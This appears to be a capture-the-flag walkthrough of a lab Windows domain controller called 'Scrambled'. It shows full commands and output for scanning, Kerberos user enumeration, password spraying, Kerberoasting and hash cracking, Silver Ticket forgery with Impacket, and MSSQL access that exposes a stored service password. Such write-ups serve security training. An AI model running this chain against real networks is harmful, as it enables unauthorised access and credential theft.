Scrambled

Windows · Medium

10.10.11.168

Reconnaissance:

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.11.168 

53/tcp   open  domain        Simple DNS Plus

80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Scramble Corp Intranet
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE

88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-31 02:15:05Z)

135/tcp  open  msrpc         Microsoft Windows RPC

139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn

389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-01-31T02:16:44+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-01-31T02:01:11
|_Not valid after:  2025-01-30T02:01:11

445/tcp  open  microsoft-ds?

464/tcp  open  kpasswd5?

593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0

636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-01-31T02:01:11
|_Not valid after:  2025-01-30T02:01:11
|_ssl-date: 2024-01-31T02:16:44+00:00; -1s from scanner time.

1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-01-31T02:16:44+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-01-31T02:11:07
|_Not valid after:  2054-01-31T02:11:07
| ms-sql-info: 
|   10.10.11.168:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433

3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-01-31T02:16:44+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-01-31T02:01:11
|_Not valid after:  2025-01-30T02:01:11

3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-01-31T02:01:11
|_Not valid after:  2025-01-30T02:01:11
|_ssl-date: 2024-01-31T02:16:44+00:00; -1s from scanner time.

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-01-31T02:16:06
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.17 seconds

┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.11.168     

53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|VoIP phone|general purpose|phone
Running: Allen-Bradley embedded, Atcom embedded, Microsoft Windows 7|8|Phone|XP|2012, Palmmicro embedded, VMware Player
OS CPE: cpe:/h:allen-bradley:micrologix_1100 cpe:/h:atcom:at-320 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2012 cpe:/a:vmware:player
OS details: Allen Bradley MicroLogix 1100 PLC, Atcom AT-320 VoIP phone, Microsoft Windows Embedded Standard 7, Microsoft Windows 8.1 Update 1, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012, Palmmicro AR1688 VoIP module, VMware Player virtual NAT device

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.11.168

53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Scramble Corp Intranet
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-31 02:31:49Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-01-31T02:35:14+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-01-31T02:01:11
|_Not valid after:  2025-01-30T02:01:11
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-01-31T02:35:13+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-01-31T02:01:11
|_Not valid after:  2025-01-30T02:01:11
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.10.11.168:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2024-01-31T02:35:13+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-01-31T02:11:07
|_Not valid after:  2054-01-31T02:11:07
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-01-31T02:01:11
|_Not valid after:  2025-01-30T02:01:11
|_ssl-date: 2024-01-31T02:35:14+00:00; -2s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-01-31T02:01:11
|_Not valid after:  2025-01-30T02:01:11
|_ssl-date: 2024-01-31T02:35:13+00:00; -2s from scanner time.
4411/tcp  open  found?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|   FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|_    ERROR_UNKNOWN_COMMAND;
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49686/tcp open  msrpc         Microsoft Windows RPC
49725/tcp open  msrpc         Microsoft Windows RPC
62302/tcp open  msrpc         Microsoft Windows RPC

Host script results:
| smb2-time: 
|   date: 2024-01-31T02:34:39
|_  start_date: N/A
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1237.74 seconds

┌──(kali💀kali)-[~]
└─$ nmap --script vuln 10.10.11.168

53/tcp   open  domain
80/tcp   open  http
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|_    Couldn't find a file-type field.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.11.168
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.11.168:80/newuser.html
|     Form id: 
|_    Form action: #
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
1433/tcp open  ms-sql-s
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl

Host script results:
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

Nmap done: 1 IP address (1 host up) scanned in 1498.85 seconds

These look like the typical ports I would expect on a Windows DC, plus 80 (HTTP), 5985 (WinRM), 1433 (MSSQL), and something unknown on 4411. LDAP shows the full hostname as DC1.scrm.local. I’ll add both DC1.scrm.local and scrm.local to my /etc/hosts file.

┌──(kali💀kali)-[~]
└─$ sudo nano /etc/hosts  
10.10.11.168	scrm.local
10.10.11.168 	dc1.scrm.local

EM: Website - TCP 80

HTTP: 3
80/tcp    open  http          Microsoft IIS httpd 10.0
4411/tcp  open  found?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

http://10.10.11.168/index.html
http://10.10.11.168/support.html

Web servers
- IIS 10.0
Operating systems
- Windows Server
JavaScript libraries
- jQuery 3.4.1

view-source:http://10.10.11.168/index.html

┌──(kali💀kali)-[~]
└─$ whatweb -a3 http://10.10.11.168/ -v 
WhatWeb report for http://10.10.11.168/
Status    : 200 OK
Title     : Scramble Corp Intranet
IP        : 10.10.11.168
Country   : RESERVED, ZZ

Summary   : HTML5, HTTPServer[Microsoft-IIS/10.0], JQuery, Microsoft-IIS[10.0], Script

Detected Plugins:
[ HTML5 ]
        HTML version 5, detected by the doctype declaration 


[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        String       : Microsoft-IIS/10.0 (from server string)

[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse 
        HTML documents, handle events, perform animations, and add 
        AJAX. 

        Website     : http://jquery.com/

[ Microsoft-IIS ]
        Microsoft Internet Information Services (IIS) for Windows 
        Server is a flexible, secure and easy-to-manage Web server 
        for hosting anything on the Web. From media streaming to 
        web application hosting, IIS's scalable and open 
        architecture is ready to handle the most demanding tasks. 

        Version      : 10.0
        Website     : http://www.iis.net/

[ Script ]
        This plugin detects instances of script HTML elements and 
        returns the script language/type. 


HTTP Headers:
        HTTP/1.1 200 OK
        Content-Type: text/html
        Last-Modified: Thu, 04 Nov 2021 18:13:14 GMT
        Accept-Ranges: bytes
        ETag: "3aed29a2a7d1d71:0"
        Server: Microsoft-IIS/10.0
        Date: Wed, 31 Jan 2024 03:23:18 GMT
        Connection: close
        Content-Length: 2313

┌──(kali💀kali)-[~]
└─$ nikto -h http://10.10.11.168 

+ Server: Microsoft-IIS/10.0
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ 8074 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2024-01-30 23:12:12 (GMT-5) (2925 seconds)

┌──(kali💀kali)-[~]
└─$ gobuster dir -u http://10.10.11.168 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt 

/images               (Status: 301) [Size: 150] [--> http://10.10.11.168/images/]
/Images               (Status: 301) [Size: 150] [--> http://10.10.11.168/Images/]
/assets               (Status: 301) [Size: 150] [--> http://10.10.11.168/assets/]
/IMAGES               (Status: 301) [Size: 150] [--> http://10.10.11.168/IMAGES/]
/Assets               (Status: 301) [Size: 150] [--> http://10.10.11.168/Assets/]

NTLM authentication is disabled:

News And Alerts 04/09/2021: Due to the security breach last month we have now disabled all NTLM authentication on our network. This may cause problems for some of the programs you use so please be patient while we work to resolve any issues

403 - Forbidden: Access is denied. http://10.10.11.168/images/ http://10.10.11.168/assets/

http://10.10.11.168/supportrequest.html Send your email to support@scramblecorp.com and we will respond as soon as possible

A screenshot leaks a username, ksimpson:

When submitting a support request via email please include your network information. You can collect this by doing the following:

Type (cmd.exe) into the start menu
In the new window that appears type (ipconfig > %USERPROFILE%\Desktop\ip.txt) and press Enter
There will now be a file named ip on your deskop. Add this file as an attachment to the email

http://10.10.11.168/newuser.html http://10.10.11.168/newuser.html?demo-category=1#

/salesorders.html has details on the “Sales Orders App”, which confirms the hostname / domain name from nmap, and also gives an indication of what TCP 4411 is used for:

http://10.10.11.168/salesorders.html

/passwords.html says: Our self service password reset system will be up and running soon but in the meantime please call the IT support line and we will reset your password. If no one is available please leave a message stating your username and we will reset your password to be the same as the username.

http://10.10.11.168/passwords.html

EM: KERBEROS

User Enumeration via Kerberos: One way to enumerate users through Kerberos is by using Kerbrute, a tool that uses impacket’s modules to brute-force Kerberos users. Since Kerberos is an authentication protocol, it tells us if the credentials provided are valid, and if the username is correct but the password is incorrect by outputting the error message “KDC_ERR_PREAUTH_FAILED”. If the username and password are incorrect, then the error is “KDC_ERR_C_PRINCIPAL_UNKNOWN”. This makes the brute-force easier. The point is, we don’t need the passwords for finding valid users. Also, add “scrm.local” and “dc1.scrm.local” to the hosts file.

/kerberos_enum_userlists /A-ZSurnames.txt

┌──(kali💀kali)-[~/go/bin/kerbrute/dist]
└─$ ./kerbrute_linux_amd64 userenum -d scrm.local --dc scrm.local /home/kali/Desktop/A-ZSurnames.txt

2024/01/31 00:09:16 >  [+] VALID USERNAME:       ASMITH@scrm.local
2024/01/31 00:12:24 >  [+] VALID USERNAME:       JHALL@scrm.local
2024/01/31 00:13:00 >  [+] VALID USERNAME:       KSIMPSON@scrm.local
2024/01/31 00:13:19 >  [+] VALID USERNAME:       KHICKS@scrm.local
2024/01/31 00:16:28 >  [+] VALID USERNAME:       SJENKINS@scrm.local

Password Spraying: I tried to check if any other users have the same passwords as their usernames using the “–user-as-pass” flag in Kerbrute. Note that the tool copies the password without converting it into smaller case. Only “ksimpson” has the same username and password.

┌──(kali💀kali)-[~/go/bin/kerbrute/dist]
└─$ nano users.txt
asmith
jhall
ksimpson
khicks
sjenkins

┌──(kali💀kali)-[~/go/bin/kerbrute/dist]
└─$ ./kerbrute_linux_amd64 passwordspray -d scrm.local --dc scrm.local --user-as-pass /home/kali/Desktop/users.txt

2024/01/31 00:56:52 >  Using KDC(s):
2024/01/31 00:56:52 >   scrm.local:88

2024/01/31 00:56:53 >  [+] VALID LOGIN:  ksimpson@scrm.local:ksimpson
2024/01/31 00:56:53 >  Done! Tested 5 logins (1 successes) in 1.663 seconds

Obtaining TGT: Once the credentials were verified to be valid, I used them to request the TGT (Ticket Granting Ticket) using Impacket’s “getTGT” script that saves the TGT as ccache (credential cache). ksimpson@scrm.local:ksimpson

┌──(kali💀kali)-[/opt/impacket-0.9.19/examples]
└─$ sudo impacket-getTGT scrm.local/ksimpson:ksimpson 
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Saving ticket in ksimpson.ccache

Now that we have the TGT, we can request the ST/TGS (Service Ticket/Ticket Granting Service) from the KDC (Key Distribution Centre), if we can find the user’s SPN (Service Principal Name). A valid TGT and an existing SPN are required to request a ST from KDC. If the SPN is registered for the domain user, the ST is encrypted with the NT hash (NTLM hash) of the user’s account. Therefore, once the ST is obtained, we can crack it on our machine. This attack (Kerberoasting) will work if the account is using a weak password.

Obtaining SPN and ST/TGS: Using Impacket’s “GetUserSPNs” script, I was able to request the ticket. Note: The GetUserSPNs has an unfixed issue when using Kerberos credentials from a ccache file. So, to fix this error you need to edit the file GetUserSPNs.py changing target = self.__kdcHost by target = self.getMachineName(). Moreover, you need to use the domain in the -dc-ip parameter to make it work.

The “KRB5CCNAME” environment variable must set as the ccache file name. The “-k” flag uses this file to pass the cache (kerberos ticket), and the “-no-pass” flag is set so that the program understands that we will pass the ticket instead of a password:

https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/GetUserSPNs.pyraw.githubusercontent.com

vi /usr/share/doc/python3-impacket/examples/GetUserSPNs.py
#    if self.__doKerberos:
#       target = self.__kdcHost
#       #target = self.getMachineName()  <-- old line 260 code that we're no longer running

Using the ticket, we can obtain the Service Principal Name of the account, which is an MSSQL service.

export KRB5CCNAME=ksimpson.ccache

┌──(kali💀kali)-[~/Desktop]
└─$ sudo KRB5CCNAME=ksimpson.ccache GetUserSPNs.py -request -dc-ip dc1.scrm.local scrm.local/ksimpson -k -no-pass 
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[-] exceptions must be old-style classes or derived from BaseException, not str

┌──(kali💀kali)-[~/Desktop]
└─$ KRB5CCNAME=ksimpson.ccachec GetUserSPNs.py -dc-ip dc1.scrm.local scrm.local/ksimpson -request -k -no-pass
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation

ServicePrincipalName          Name    MemberOf  PasswordLastSet             LastLogon                   Delegation 
----------------------------  ------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/dc1.scrm.local:1433  sqlsvc            2021-11-03 12:32:02.351452  2022-06-30 01:27:08.621499             
MSSQLSvc/dc1.scrm.local       sqlsvc            2021-11-03 12:32:02.351452  2022-06-30 01:27:08.621499             

$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$62b20419c8bc0e2a7d02052df5753b96$e616585549804e13b6d66d67fbc3c60afad364f5cc487446239dde9b16041e1eea8cb900e53d1ad1bcf4bc9af63247e05e5cb304fac633713a5be5e50b676f18fbf20b89d1e07b1b56079dbfd9e05caa673b7b6b6ee1b83b77d9d0036676ba84ca28bf1ffec4b3c27de1a6e8a9c144859710e29f4c953426d3fa61964b4e0142f1313d8a2358c8a87cf4ce38a2c12258faca6af39d98c185b1fedf372ad16b6ef34c47a4a476a54d2ea292ed5688cd862e3f57cfb1efa1e32ed34418c772c8418ab93ea4c9b662523378df995ab65f333d68fe0b1844cfb4c0f6a47a8a9e01a89e1dafbaf8b9c650c448399402fac52ec0608d99013a9b411bc57af27553149cfb929551548aae20daa4957bf5181967e553ac3993e55d57e4d60133b55ed7cb622ade4e8a28fd4f09681f3afa870d9c01daeea54f82458fbb5f7f1e897e258d7b8641c84cc70b2a17092e57efbedf88ce00c7851a58499a7e87dc896365cad120f55c6c12ff4e203c354418c129b9af4ca8c805be9bf5dfc87b427961165d5296903eee37be9a4c9af95810837d0adcbaee8bbc0ed3b0bd23dd6f8982b14ce11e07b6f69b8b819bf243839b5868f9508820ee3f448197c75666a11ecf59f326f763bd84f5e03e49a214d0752d1324b3715939e294dc135a71d54c07eb6e88c121f5f208e26c6adcd1b25d4120653d1f91504f10ec1d75984adb91969786ea3d01f7ef4ee27eff80a1c6f598aebd9c4628cd2d934471b2406656f63f098c4119314981d275664e822a07eae2dd1c4d4661acea655840d5bac2ce4d9c29008eaea4ae947a60c8fe92373cfb629875b7942363c7218d8e7ff6225691376d3ed05bd6f0a19d7f26c1664c6d82d6a37126b9a57e5a48fc84b6a55df3ff46579575c83e3f49a0acb7a4e9c87a9e335895c483e7fd7ea0d2ef91dd33c8886ff8d5ab91f0e0e872117d4d965560e39d6c0ceebaf955aa48e21753f452a66b1f97363252701066fe37ea5a610edf5227d14835ff195335b0bdce307d042430d3be4519bec68acd70a1f8fabf42125123436feb928bf715273f052a7c35999342ae72d1de8b0427674e1f4540794f9eb7342b9e6edfde91d320525e94bbc9128e4309e82612c36e7b5c8bf41781af6a817ae3d5fdb3ae6f8a6c3847e38a45c3b554f1776961a21440b2e39b2e881c7caff344bbc39ee1073d77279cabd3be0dca0e0fa281d38147aec9ceef7d30273911f0743a08d9dafb23a88e6ae889f91729c59a1492bacc677139003d076b006d966d4c05f1ad5f75e5c09749b549635174f2c75dc9c95b28aab4ecb2a991670f93c11cf87d67ab5a1bb0c5be523aee1ed2990c7d7b472b5fd79ec9fad9de4ec8b6ece67317e312183f671861c8c6057820f18ac34d5c8ae13c7d46edec6d212de8ecba1707f61b0dd99f11146e3fe3b7

Cracking TGS using HashCat: Then, using john, we can crack the password, which will get us handy in the future.

┌──(kali💀kali)-[~/Desktop]
└─$ john -w=/usr/share/wordlists/rockyou.txt  ksimpson_hash.txt

In less than a minute on my system it breaks to “Pegasus60”.

FOOTHOLD: Shell as MiscSvc

139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds?

TOOLS: Because NTLM authentication is disabled, I won’t be able to use many of the standard tools here, and I won’t be able to access any service by IP address if it requires authentication.

smbclient won’t work, and I wasn’t able to get crackmapexec to work either.

Since a username was found and port 445 was open during the initial nmap scan, you can use impacket’s smbclient with the -k option to use kerberos. This will help validate if you have a valid username and password pair. Since public shares can be browsed with the valid credential you can pull down the Network Security Changes.pdf file to view its contents.

Enumerating SMB shares using TGT: I used the TGT to access the SMB shares and found a file named “Network Security Changes.pdf”.

┌──(kali💀kali)-[~/Desktop]
└─$ smbclient.py -k scrm.local/ksimpson:ksimpson@dc1.scrm.local -dc-ip dc1.scrm.local
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
Type help for list of commands
# 

┌──(kali💀kali)-[~/Desktop]
└─$ KRB5CCNAME=ksimpson.ccache smbclient.py -k -no-pass dc1.scrm.local
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
Type help for list of commands
#

Most ksimpson can’t access:

# use ADMIN$
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
# use C$
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
# use HR
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
# use IT
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
# use Sales
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

There’s a single document in Public:

# use Public
# ls
drw-rw-rw-          0  Thu Nov  4 18:23:19 2021 .
drw-rw-rw-          0  Thu Nov  4 18:23:19 2021 ..
-rw-rw-rw-     630106  Fri Nov  5 13:45:07 2021 Network Security Changes.pdf

# get Network Security Changes.pdf

Network Security Changes.pdf: The document is a letter from the IT staff to all employees: This mentions again that NTLM is disabled because of an NTLM relay attack, and now everything is done via Kerberos. It also mentions that the SQL database has had access removed from the HR department.

Kerberoast:

Collect Challenge/Response GetUserSPNs.py (another Impactet script) is typically how fetch a potentially crackable challenge/response from a Windows Server. However, when Scrambled was released, it breaks:

Some Googling shows that the author of this box has raised an issue on the Impacket GitHub for this very error with the title “GetUserSpns.py fails when using -k option and NTLM auth is disabled”. The suggested fix in that issue is to edit one line, which I’ll do on line 260:

https://github.com/SecureAuthCorp/impacket/issues/1206github.com

        if self.__doKerberos:
            #target = self.getMachineName()
            target = self.__kdcHost

After making that change, it dumps a challenge/response (or “hash”, but not really a hash) for the MSSQLSvc user: GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-ip dc1.scrm.local -request -k

The issue has been fixed, and if I use the up to date Impacket, I just need to use -dc-host instead of -dc-ip:

MSSQL Access: Silver Ticket

These creds don’t actually directly allow access to anything new for me. But because this account is running the SQL service, I can use the password to perform a Silver Ticket attack. The overview linked there from adsecurity.org is really good. A Silver Ticket is a forged TGS (Ticket Granting Service) ticket, which is used directly between the client and the service, without necessarily going to the DC. Instead, the TGS ticket is signed by the service account itself, and thus the Silver Ticket is limited to authenticating only the service itself.

How Attackers Use Kerberos Silver Tickets to Exploit SystemsActive Directory & Azure AD/Entra ID Security

Silver Ticket - HackTricksbook.hacktricks.xyz

To create a Silver Ticket, an attacker needs:

The NTLM hash of the password for the service account;
The SID of the domain
The service principle name (SPN) associated with the account.

NTLM Hash: To get an NTLM hash of the password “Pegasus60”, I’ll use the commands from this post:

Generate NTLM hashes via command lineblog.atucom.net

┌──(kali💀kali)-[~/Desktop]
└─$ iconv -f ASCII -t UTF-16LE <(printf "Pegasus60") | openssl dgst -md4                
MD4(stdin)= b999a16500b87d17ec7f2e2a68778f05

CrackStation will verify that:
https://crackstation.net/

https://codebeautify.org/ntlm-hash-generator
B999A16500B87D17EC7F2E2A68778F05

Domain SID: To get the domain SID, I’ll need to connect back to LDAP, but authenticated. It takes a good deal of troubleshooting and Goolging to get this working (thanks to TheCyberGeek for some tips on this one). If I try to connect as ksimpson, I get an error about SSL/TLS being required:

┌──(kali💀kali)-[~/Desktop]
└─$ getPac.py -targetUser sqlsvc scrm.local/sqlsvc:Pegasus60 | grep "Domain SID"
Domain SID: S-1-5-21-2743207045-1827831105-2542523200

SPN: I already acquired the SPN with GetUserSPNS.py above, MSSQLSvc/dc1.scrm.local:1433.

Generate Ticket: ticketer.py (or impacket-ticketer) will generate a ticket using the information gathered:

┌──(kali💀kali)-[~/Desktop]
└─$ ticketer.py -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -dc-ip dc1.scrm.local -spn MSSQLSvc/dc1.scrm.local:1433 administrator
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in administrator.ccache

The output file is administrator.ccache, which is a kerberos ticket as administrator that only the MSSQL service will trust.

Connect: On Linux, Kerberos looks in predefined places for tickets, like /tmp/krb5cc_[uid of current user] and any file pointed to by the KRB5CCACHE environment variable. If I just run klist, it will fail to find the new ticket: Using that same method, mssqlclient.py can connect to the DB using the ticket:

┌──(kali💀kali)-[~/Desktop]
└─$ KRB5CCNAME=administrator.ccache mssqlclient.py -k dc1.scrm.local
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL>

MSSQL Enumeration:

Find Password: I’ll start by listing the databases:

SQL> select name, database_id from sys.databases;
name                                        database_id   
master                                                1   
tempdb                                                2   
model                                                 3   
msdb                                                  4   
ScrambleHR                                            5

ScrambleHR seems interesting. It has three tables:

SQL> SELECT TABLE_NAME FROM ScrambleHR.INFORMATION_SCHEMA.TABLES;
TABLE_NAME   
Employees
UserImport
Timesheets

The Employees and Timesheets tables are empty. There’s one row in UserImport:

SQL> SELECT * from ScrambleHR.dbo.UserImport;
LdapUser               LdapPwd                LdapDomain             RefreshInterval   IncludeGroups   
--------------------   --------------------   --------------------   ---------------   -------------   
MiscSvc                ScrambledEggs9900      scrm.local                          90               0

